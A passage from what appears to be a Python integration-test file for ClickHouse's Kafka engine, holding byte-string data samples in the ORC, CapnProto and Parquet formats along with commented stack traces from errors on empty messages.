b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\
x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\
x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03